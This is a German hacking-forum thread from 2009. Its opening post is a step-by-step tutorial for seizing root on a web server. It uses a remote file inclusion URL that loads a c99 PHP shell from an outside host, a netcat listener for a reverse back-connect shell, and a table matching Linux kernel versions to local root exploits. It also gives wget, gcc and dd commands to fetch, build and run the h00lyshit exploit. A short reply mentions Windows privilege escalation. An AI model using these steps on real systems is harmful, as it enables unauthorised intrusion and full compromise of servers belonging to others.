Ergebnis 1 bis 2 von 2
  1. 29.07.2009, 12:03 #1
    trisn
    trisn ist offline
    bit creepy!? Avatar von trisn
    Registriert seit
    01.01.2009
    Beiträge
    894

    Standard r00ting über RFI

    r00ting über RFI


    Written Tutorial by trisn


    Ich gehe davon aus das ihr euch mit dem Wesen der RFI/LFI befasst
    habt und diese ausführen könnt.

    Code:
    Was wir brauchen


- Vulnerable RFI Seite
- Eine PHP Shell wie c99,r57,r100 oder MulCiShell 2.0
- NetCat
- Local Root Exploit eingepasst für den Kernel und die Version der RootServers

    Ich erkläre euch den generellen Ablauf.



    Wir finden einen RFI Vulnerable Page

    www.vuln.de/home/Site=http://myftp.com/c99.php


    Jetzt haben wir Zugriff auf den r00t und werden und das ganze mal genauer ansehen.

    Bei einer c99 findet ihr den SAFE-MOD auf der rechten Seite , wir gehen davon aus

    das dieser auf OFF steht.

    Wir können nun auch die Version des Kernels sehen oder durch eingeben in die Commandozeile
    Code:
    uname - a
    Nun benutzen wir die BackConnection Funktion die wir leicht in r57 oder c99 finden (Version bedingt)

    Nun Öffnen wir NetCat und gehen zu einem spezifischen Port (der Port muss offen sein ((Firewall aus)) wenn wir einen Router haben)

    Wir geben 11457 als Port an , das ist der Port für die r57 Shell (Letzt erschienene Version)

    Nun gehen wir in die cmd und öffnen das NetCat Verzeichniss

    cd C:\Programme\NetCat zB

    Wir geben folgendes ein ;
    Code:
    nc -n -l -p 11457
    Nun baut er den Start Connect auf

    In der mitte der r57 finden wir im Menü NET und Back-Connect.
    Geben unsere IP ein.
    Nun gehen wir auf www.cmyip.com um zusehen ob wir eine Dynamische IP haben

    In die Port eingabe geben wir den Port zu dem NetCat connectet ein.

    Wenn wir Connect drücken gibt uns NetCat eine Shell zum Server

    Nun fangen wir ein den Server zu r00ten =)

    Wir müssen ein veränderbares Root Exploit (angepasst an den Kernel und die Version finden)
    Wenn nicht kriegen wir eine Fehlermeldung das wir keine Zugriffsrechte haben.

    Code:
    Hier Versionen + jeweiliges Exploit

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
    Wir sehen das es der 2.6.8 Linux Kernelist

    Wir brauchen das h00lyshit exploit

    Zu finden unter milw0rm , Security-Pass usw.

    Wir können den /tmp Ordner benutzen weil er ein Standart Ordner zum beschreiben ist.

    cd /tmp

    Zum Download Command von Linux Kerneln benutzen wir zB wget.

    Zum sehen

    wget www.vuln.de/localroot/h00lyshit.c
    where www.vuln.de/localroot/h00lyshit.c ist die URL

    Nach dem Download müssen wir das Exploit bearbeiten so das es angepasst wird

    bei h00lyshit müssen wir

    gcc h00lyshit.c -o h00lyshit

    eingeben

    Nun haben wir das File h00lyshit erstellt

    Der Command um das Exploit zu starten ist

    ./h00lyshit <Eine große Datei auf dem Server>

    Wir müssen eine große Datei wählen um Access zum root zu bekommen

    Und einen großen ordner erstellen in /tmp oder einem anderen beschreibbaren Ordner

    Der Command ist

    dd if=/dev/urandom of=NamedesFiles count=2m

    Wir müssen 2-3 Minuten warten

    Wenn der Command nicht funktioniert nehmen wir diesen


    dd if=/dev/zero of=/tmp/NamedesFiles count=102400 bs=1024


    Nun können wir das Exploit zum laufen bringen unter der Eingabe

    ./h00lyshit NamedesFiles

    oder

    ./h00lyshit /tmp/NamedesFiles


    Wenn keine Fehlermeldungen kommen haben wir nun Zugriff zum R00tServer

    Um nachzusehen ;

    id

    oder

    whoami eingeben

    Wenn es root ausgibt haben wir den r00t ger00tet

    Nun können wir auf die kompletten Server zugreifen

    ################################################## ###

    Das ganze werde ich nochmal in einem V-TUT demonstrieren
    nur leider hab ich mit meiner Festplatte zurzeit zu kämpfen :/

    ################################################## ####

    Credits gehen mit zur 1nj3ct Crew - N() 1

    *

    trisn
    __ __
    \/----\/
    \0 0/
    _\ /_
    _| \/ |_
    | | | | | |
    _| | | | | |_
    "---|_|--|_|---"


    määäähh.
    Zitieren Zitieren
  2. 29.07.2009, 12:49 #2
    fred777
    fred777 ist offline
    _fred_ Avatar von fred777
    Registriert seit
    20.08.2008
    Beiträge
    1.967

    Standard

    Naja man nutzt halt 2 Schritte aus, Connect per Shell und dann ein Rootexploit, einfacher gehts eigentlich auch nicht wenn man schonmal eine RFI hat
    Bei Windows Servern könnt ihr versuchen eine Privilege Escalation etc.. auszunutzen außer ihr habt Zugriff auf net user Options (add) ..
    _n0p3_
    Zitieren Zitieren
« Vorheriges Thema | Nächstes Thema »

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

Foren-Regeln